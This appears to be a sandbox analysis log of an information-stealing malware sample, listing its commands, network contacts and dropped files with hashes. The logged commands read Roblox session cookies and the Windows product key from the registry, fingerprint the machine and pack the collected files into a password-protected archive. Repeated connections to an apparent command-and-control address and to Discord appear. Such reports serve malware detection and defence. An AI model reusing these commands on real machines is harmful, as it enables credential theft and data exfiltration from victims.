C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cy3qb13v\cy3qb13v.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC15C.tmp" "c:\Users\Admin\AppData\Local\Temp\cy3qb13v\CSC40F73E6235404006889B1BBCC9AB145C.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\kZ3vu.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\kZ3vu.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 147.185.221.23:33942 tcp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.137.232:443 discord.com tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp
US 147.185.221.23:33942 tcp

Files

memory/396-0-0x00007FF935933000-0x00007FF935935000-memory.dmp

memory/396-1-0x0000000000380000-0x0000000001516000-memory.dmp

C:\Users\Admin\AppData\Roaming\eternal.exe

MD5 7439cc991a9a756c41153b8e9121baab
SHA1 c62528386e5f62ff2975cc8ed0cad3a7d362e632
SHA256 31a2b821e933bb193d94438d4a5aa036519535336c936d65b66889fb03164e2d
SHA512 cbdfd77671884407f8f4bd9c5251df5d8896b29bd004ea52460eda8a222df7492c69572e044376315624220f3ea66de3aff34323ea281591ca2975f90fa6dd51

memory/1432-13-0x00000000006E0000-0x00000000006F8000-memory.dmp

memory/1432-14-0x00007FF935930000-0x00007FF9363F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\skuld.exe

MD5 dbbd2127d1030e4c9548fdf7de9983a7
SHA1 5b7939a94cbd908ad8f57bb2e5328cce657c3700
SHA256 8e3601302c0294914808b6537cd27de961d087ba0807590b981b7f8c8aa5eee6
SHA512 95a1112c9b062745df9c20f566cfcb9421221111d02db0c1a940a5ea230b09c39a487685ae674c350e4641132e3360a19ca0cd8762f7e46cecde8b7dd85fe5d2

C:\Users\Admin\AppData\Roaming\program.exe

MD5 3e6865657b29faea3a355c710f0aad45
SHA1 ad9b98fa0f96685abc17aaab7fe4d65ac8fe34f7
SHA256 2c48f7bc874f1c812c0031519e756c28f940a58b2f64cdb40a08f1ccc798f671
SHA512 b360b5a244e83ee95719d7e781b9a49a29a5251e936619786b0151d0992aee33746109b3a8b0ab8d18c2788b738892c9b296c8c601025e16d850d730837b1615

C:\Users\Admin\AppData\Local\Temp\_MEI38242\python313.dll

MD5 6ef5d2f77064df6f2f47af7ee4d44f0f
SHA1 0003946454b107874aa31839d41edcda1c77b0af
SHA256 ab7c640f044d2eb7f4f0a4dfe5e719dfd9e5fcd769943233f5cece436870e367
SHA512 1662cc02635d63b8114b41d11ec30a2af4b0b60209196aac937c2a608588fee47c6e93163ea6bf958246c32759ac5c82a712ea3d690e796e2070ac0ff9104266

C:\Users\Admin\AppData\Local\Temp\_MEI38242\VCRUNTIME140.dll

MD5 862f820c3251e4ca6fc0ac00e4092239
SHA1 ef96d84b253041b090c243594f90938e9a487a9a
SHA256 36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153
SHA512 2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

memory/3404-61-0x00007FF9325C0000-0x00007FF932C23000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_ctypes.pyd

MD5 79879c679a12fac03f472463bb8ceff7
SHA1 b530763123bd2c537313e5e41477b0adc0df3099
SHA256 8d1a21192112e13913cb77708c105034c5f251d64517017975af8e0c4999eba3
SHA512 ca19ddaefc9ab7c868dd82008a79ea457acd71722fec21c2371d51dcfdb99738e79eff9b1913a306dbedacb0540ca84a2ec31dc2267c7b559b6a98b390c5f3a7

C:\Users\Admin\AppData\Local\Temp\_MEI38242\base_library.zip

MD5 a9cbd0455b46c7d14194d1f18ca8719e
SHA1 e1b0c30bccd9583949c247854f617ac8a14cbac7
SHA256 df6c19637d239bfedc8cd13d20e0938c65e8fdf340622ff334db533f2d30fa19
SHA512 b92468e71490a8800e51410df7068dd8099e78c79a95666ecf274a9e9206359f049490b8f60b96081fafd872ec717e67020364bcfa972f26f0d77a959637e528

C:\Users\Admin\AppData\Local\Temp\_MEI38242\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

memory/3404-67-0x00007FF94ABB0000-0x00007FF94ABD7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_ssl.pyd

MD5 7ef27cd65635dfba6076771b46c1b99f
SHA1 14cb35ce2898ed4e871703e3b882a057242c5d05
SHA256 6ef0ef892dc9ad68874e2743af7985590bb071e8afe3bbf8e716f3f4b10f19b4
SHA512 ac64a19d610448badfd784a55f3129d138e3b697cf2163d5ea5910d06a86d0ea48727485d97edba3c395407e2ccf8868e45dd6d69533405b606e5d9b41baadc0

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_sqlite3.pyd

MD5 8cd40257514a16060d5d882788855b55
SHA1 1fd1ed3e84869897a1fad9770faf1058ab17ccb9
SHA256 7d53df36ee9da2df36c2676cfaea84ee87e7e2a15ad8123f6abb48717c3bc891
SHA512 a700c3ce95ce1b3fd65a9f335c7c778643b2f7140920fe7ebf5d9be1089ba04d6c298bf28427ca774fbf412d7f9b77f45708a8a0729437f136232e72d6231c34

memory/3404-85-0x00007FF951330000-0x00007FF95133F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_socket.pyd

MD5 14392d71dfe6d6bdc3ebcdbde3c4049c
SHA1 622479981e1bbc7dd13c1a852ae6b2b2aebea4d7
SHA256 a1e39e2386634069070903e2d9c2b51a42cb0d59c20b7be50ef95c89c268deb2
SHA512 0f6359f0adc99efad5a9833f2148b066b2c4baf564ba16090e04e2b4e3a380d6aff4c9e7aeaa2ba247f020f7bd97635fcdfe4e3b11a31c9c6ea64a4142333424

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_queue.pyd

MD5 513dce65c09b3abc516687f99a6971d8
SHA1 8f744c6f79a23aa380d9e6289cb4504b0e69fe3b
SHA256 d4be41574c3e17792a25793e6f5bf171baeeb4255c08cb6a5cd7705a91e896fc
SHA512 621f9670541cac5684892ec92378c46ff5e1a3d065d2e081d27277f1e83d6c60510c46cab333c6ed0ff81a25a1bdc0046c7001d14b3f885e25019f9cdd550ed0

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_lzma.pyd

MD5 055eb9d91c42bb228a72bf5b7b77c0c8
SHA1 5659b4a819455cf024755a493db0952e1979a9cf
SHA256 de342275a648207bef9b9662c9829af222b160975ad8925cc5612cd0f182414e
SHA512 c5cba050f4b805a299f5d04ec0dce9b718a16bc335cac17f23e96519da0b9eaaf25ae0e9b29ef3dc56603bfe8317cdc1a67ee6464d84a562cf04bea52c31cfac

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_hashlib.pyd

MD5 d6f123c4453230743adcc06211236bc0
SHA1 9f9ade18ac3e12bcc09757a3c4b5ee74cf5e794e
SHA256 7a904fa6618157c34e24aaac33fdf84035215d82c08eec6983c165a49d785dc9
SHA512 f5575d18a51207b4e9df5bb95277d4d03e3bb950c0e7b6c3dd2288645e26e1de8edcf634311c21a6bdc8c3378a71b531f840b8262db708726d36d15cb6d02441

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_decimal.pyd

MD5 21d27c95493c701dff0206ff5f03941d
SHA1 f1f124d4b0e3092d28ba4ea4fe8cf601d5bd8600
SHA256 38ec7a3c2f368ffeb94524d7c66250c0d2dafe58121e93e54b17c114058ea877
SHA512 a5fbda904024cd097a86d6926e0d593b0f7e69e32df347a49677818c2f4cd7dc83e2bab7c2507428328248bd2f54b00f7b2a077c8a0aad2224071f8221cb9457

C:\Users\Admin\AppData\Local\Temp\_MEI38242\_bz2.pyd

MD5 58fc4c56f7f400de210e98ccb8fdc4b2
SHA1 12cb7ec39f3af0947000295f4b50cbd6e7436554
SHA256 dfc195ebb59dc5e365efd3853d72897b8838497e15c0977b6edb1eb347f13150
SHA512 ad0c6a9a5ca719d244117984a06cce8e59ed122855e4595df242df18509752429389c3a44a8ba0abc817d61e37f64638ccbdffc17238d4c38d2364f0a10e6bc7

C:\Users\Admin\AppData\Local\Temp\_MEI38242\unicodedata.pyd

MD5 b2712b0dd79a9dafe60aa80265aa24c3
SHA1 347e5ad4629af4884959258e3893fde92eb3c97e
SHA256 b271bd656e045c1d130f171980ed34032ac7a281b8b5b6ac88e57dce12e7727a
SHA512 4dc7bd1c148a470a3b17fa0b936e3f5f68429d83d552f80051b0b88818aa88efc3fe41a2342713b7f0f2d701a080fb9d8ac4ff9be5782a6a0e81bd759f030922

C:\Users\Admin\AppData\Local\Temp\_MEI38242\sqlite3.dll

MD5 21aea45d065ecfa10ab8232f15ac78cf
SHA1 6a754eb690ff3c7648dae32e323b3b9589a07af2
SHA256 a1a694b201976ea57d4376ae673daa21deb91f1bf799303b3a0c58455d5126e7
SHA512 d5c9dc37b509a3eafa1e7e6d78a4c1e12b5925b5340b09bee06c174d967977264c9eb45f146abed1b1fc8aa7c48f1e0d70d25786ed46849f5e7cc1c5d07ac536

C:\Users\Admin\AppData\Local\Temp\_MEI38242\select.pyd

MD5 fb70aece725218d4cba9ba9bbb779ccc
SHA1 bb251c1756e5bf228c7b60daea1e3b6e3f9f0ff5
SHA256 9d440a1b8a6a43cfaa83b9bc5c66a9a341893a285e02d25a36c4781f289c8617
SHA512 63e6db638911966a86f423da8e539fc4ab7eb7b3fb76c30c16c582ce550f922ad78d1a77fa0605caffa524e480969659bf98176f19d5effd1fc143b1b13bbaaf

memory/1432-89-0x00007FF935930000-0x00007FF9363F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI38242\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI38242\libssl-3.dll

MD5 b2e766f5cf6f9d4dcbe8537bc5bded2f
SHA1 331269521ce1ab76799e69e9ae1c3b565a838574
SHA256 3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4
SHA512 5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

C:\Users\Admin\AppData\Local\Temp\_MEI38242\libcrypto-3.dll

MD5 8377fe5949527dd7be7b827cb1ffd324
SHA1 aa483a875cb06a86a371829372980d772fda2bf9
SHA256 88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d
SHA512 c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

C:\Users\Admin\AppData\Local\Temp\_MEI38242\blank.aes

MD5 1be47f04f81b4c7c0b83e59ad5fee5ce
SHA1 a8f99aa6c5099db5047c5795d96bcb3027558403
SHA256 0c9c4af5acafbc2e3f9611f3778ec6bc2db3cc5b9cc33259b4ce2d9658e2e9ab
SHA512 b98887394d17a51b4cda9053c7bc071b7776fc5887c415715bd9211828158eb7e44d2a4b376c95ade9dbec529afd656589cebe82d8b0e6177d2489bcf7befae0

memory/3404-97-0x00007FF947DA0000-0x00007FF947DCB000-memory.dmp

memory/3404-100-0x00007FF94D150000-0x00007FF94D169000-memory.dmp

memory/3404-105-0x00007FF9512F0000-0x00007FF9512FD000-memory.dmp

memory/3404-104-0x00007FF94CDA0000-0x00007FF94CDB9000-memory.dmp

memory/3404-111-0x00007FF947100000-0x00007FF9471CE000-memory.dmp

memory/3404-113-0x00007FF947A90000-0x00007FF947AC4000-memory.dmp

memory/3404-116-0x00007FF944C30000-0x00007FF945163000-memory.dmp

memory/3404-118-0x00007FF94BC80000-0x00007FF94BC94000-memory.dmp

memory/3404-119-0x00007FF9325C0000-0x00007FF932C23000-memory.dmp

memory/3404-117-0x00007FF951290000-0x00007FF95129D000-memory.dmp

memory/3404-112-0x000002C3557B0000-0x000002C355CE3000-memory.dmp

memory/1432-110-0x00007FF935930000-0x00007FF9363F2000-memory.dmp

memory/3404-101-0x00007FF9471D0000-0x00007FF94734F000-memory.dmp

memory/3404-98-0x00007FF947CB0000-0x00007FF947CD5000-memory.dmp

memory/3304-123-0x0000021BE6990000-0x0000021BE69B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_evftgzmd.cw2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa4f31835d07347297d35862c9045f4a
SHA1 83e728008935d30f98e5480fba4fbccf10cefb05
SHA256 99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0
SHA512 ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

memory/3404-153-0x00007FF94ABB0000-0x00007FF94ABD7000-memory.dmp

memory/3404-157-0x00007FF947040000-0x00007FF9470F3000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\cy3qb13v\cy3qb13v.cmdline

MD5 5fe840240e68c0e3ff0ed44e17d1715e
SHA1 731bf5138a3ba1aa6628897274533c99af9637ee
SHA256 fecef2fa002d182b5a9a3d163a9acd467d2b0a54720ea85bed7b46558f3d5f6d
SHA512 6c1c221a7a074087c30403755ea8556af8e021d699c29ec013693127815b506f848eb55e4a9c568e729bb34f2098a1fd949bfe8d9389722a81c8f9c6dddc728b

\??\c:\Users\Admin\AppData\Local\Temp\cy3qb13v\cy3qb13v.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\cy3qb13v\CSC40F73E6235404006889B1BBCC9AB145C.TMP

MD5 f9e597d93c878be0c79f34fa18486d9b
SHA1 7aa703b847ad447532ebdb604224de21ff93eb59
SHA256 8352555a8f80f53233c57304b171c06a41d1a4e79af9c7b56cbde81a0021f95d
SHA512 c55424446c1dd48e32e18716cdcea4aa98c4e6f2be6185c22f9bcdf337ff3a9986f89da9ef74a64fc17f842558d20ddadb65665bc10e9d95faa4dc541a6915a5

C:\Users\Admin\AppData\Local\Temp\RESC15C.tmp

MD5 94a2ba824fd06600b0e3cdf6e4b9fdf0
SHA1 5987e30df138b8726513a440e9ceae66f61652c4
SHA256 372d4b49ea1e980fec7dacc131da58f676dc361244e3f6437ce420f9f38e12b4
SHA512 cd3c22e1949794fbb651b49700ba3e912bf26c0b218e234b4e68f54c761293f434b019f2f7ffe8328c59cdb7448bd2eb6e408892e1f1a6f02309a5ca2e8e84ac

C:\Users\Admin\AppData\Local\Temp\cy3qb13v\cy3qb13v.dll

MD5 091b4295dc0a11d7bf242c0191fd73bb
SHA1 914abdfbd25d665211d6a6895b56326dbb2dd88b
SHA256 537cb5de38993775e23cc8c0069c45c18bb3495c6d0f949853b6391a450ab30a
SHA512 206df2137bca1ffe7e1147f400f7df76f54384f1e00b640016dc3156ae4f275c38afc9d8bc699b814eca5a3e3bd411b5da54c66d4034b7a14a23c25cc8de97b8

memory/424-274-0x00000234722E0000-0x00000234722E8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3d40a003331862480ceedde73fedb88c
SHA1 224f5a1c14e559ac6b57cc0e12a1e4f43b9292b3
SHA256 c8ebdca5183ceac83ac05c0fca4b8cf3027d8dc6c956a516d6ba34174cfc2cf4
SHA512 347b5b6ae5833926409ebc36769d6b0e280f5432c33a6290318ca2f48d8dff242339c42e5431443544568229d8aac2bd44ff0bcc8ca83a0d5cda8cb3b99c50ff

memory/3404-300-0x00007FF947CB0000-0x00007FF947CD5000-memory.dmp

memory/3404-332-0x00007FF9471D0000-0x00007FF94734F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cd5b2555a0e703bc746e242654a09c2f
SHA1 4021bfba22c0fce16709bfa6140d11272b7bd8b4
SHA256 73679042b477828c6c8400590ca1434f5f6b7379aede1442f80bb9ede3bc7811
SHA512 404a94bbc1cbcf98dba90160ab65a8acc5a1660d801bf7425ab1fe641599bda1b6494d4d6b65c6584e4ca6c1dea4b1acfde88e4a6d216194dca3b6ae6ca605f1

C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌‎ \Common Files\Desktop\EditDismount.docx

MD5 8d55da89ab403a0960ac14acc6e2191f
SHA1 1b875960a214baacc526152f3804fdecd4ec9fca
SHA256 78f854bdc4623c1aa7552b181ecdf8c090681bd93bda61fd8d6d742376db8c87
SHA512 615378ba0f42329a4c2dacb00efdac264134246ffa6bf0b5269502c84c8dacc9605f0ce39d278a4e842cb9958f87be327598c52a7dc7544eb772ee34ad8ea8e6

memory/3404-357-0x00007FF947100000-0x00007FF9471CE000-memory.dmp

memory/3404-361-0x00007FF947040000-0x00007FF9470F3000-memory.dmp

memory/3404-358-0x00007FF944C30000-0x00007FF945163000-memory.dmp

memory/3404-347-0x00007FF9325C0000-0x00007FF932C23000-memory.dmp

memory/3404-353-0x00007FF9471D0000-0x00007FF94734F000-memory.dmp

memory/3404-356-0x00007FF947A90000-0x00007FF947AC4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌‎ \Common Files\Desktop\ExportDeny.png

MD5 660f2f7d5538d4d7c4a923e927c7c178
SHA1 e766506820dfc13a8c8a8c635f334b268c4e0d08
SHA256 d14314f800e44156114ac57b342b9b6a680804be4c5ea35115891e1f486e9125
SHA512 1d789a4174709d552f982ae4103a43f36a3188c9777d321f70c25f9756092c8f689e8206cf6f5bb7b0dc5ab5fd64f504941d751c326f51ac491e557aa530105a

C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌‎ \Common Files\Desktop\ShowPublish.xlsx

MD5 5c7e2c265d970faa5be10433e9230784
SHA1 5d904eee33f1c6a40800ef913902af53006df2e9
SHA256 855e0de6a3ed2a32202bba170096462a9fecb01839a1737805f57c58207b2a7a
SHA512 fc570ee6d4f89544f24b4a8f73243c568597c70ee8866c7b07ea917535bcfb1cd4c51ae1a9518917eb53a6e8bf4d64ad7aea70449c5e06786dd16630352aadd6

C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌‎ \Common Files\Desktop\StartShow.docx

MD5 577478da53dfc4133071e4bb056eb6d5
SHA1 047a79042bc4e6497be3e099c98489841cbf8902
SHA256 120c29c79fa686e54e11a93e64260419bd70b1019ba38ee07acf29d207bbf6b5
SHA512 6847eb2c7ee56a675838f0c9d52f8fe5c6d7ee5f5fb75ecbf51e593396bb352656f12051b027dd41b4b48aa40dea56b8d5f0a60677541cb12a48319311d1a4ac

C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌‎ \Common Files\Desktop\StartReceive.xlsx

MD5 eaf1908bf612bfe6b490eeed471c2491
SHA1 67abfa46815c512dafc735bcd109c87fbf31f642
SHA256 4a7719e2232d2cac5e4756de3244d42ece3cd69ac320bfc46392f6fdf75031c1
SHA512 7b891cb0cfca44d7db45b956772bd13d2e220517957bb7e807549a479021e1c919973242e03a261f3ba47df6fbc0b1c2f20290872b161a851665c9d188cbd1a7

memory/3404-366-0x000002C3557B0000-0x000002C355CE3000-memory.dmp

memory/3404-386-0x00007FF9325C0000-0x00007FF932C23000-memory.dmp

memory/3404-401-0x00007FF9325C0000-0x00007FF932C23000-memory.dmp

memory/3404-422-0x00007FF947CB0000-0x00007FF947CD5000-memory.dmp

memory/3404-423-0x00007FF9471D0000-0x00007FF94734F000-memory.dmp

memory/3404-415-0x00007FF947040000-0x00007FF9470F3000-memory.dmp

memory/3404-427-0x00007FF951290000-0x00007FF95129D000-memory.dmp

memory/3404-426-0x00007FF947100000-0x00007FF9471CE000-memory.dmp

memory/3404-425-0x00007FF9512F0000-0x00007FF9512FD000-memory.dmp

memory/3404-424-0x00007FF94CDA0000-0x00007FF94CDB9000-memory.dmp

memory/3404-421-0x00007FF947DA0000-0x00007FF947DCB000-memory.dmp

memory/3404-420-0x00007FF94D150000-0x00007FF94D169000-memory.dmp

memory/3404-419-0x00007FF951330000-0x00007FF95133F000-memory.dmp

memory/3404-418-0x00007FF94ABB0000-0x00007FF94ABD7000-memory.dmp

memory/3404-417-0x00007FF94BC80000-0x00007FF94BC94000-memory.dmp

memory/3404-416-0x00007FF947A90000-0x00007FF947AC4000-memory.dmp

memory/3404-412-0x00007FF944C30000-0x00007FF945163000-memory.dmp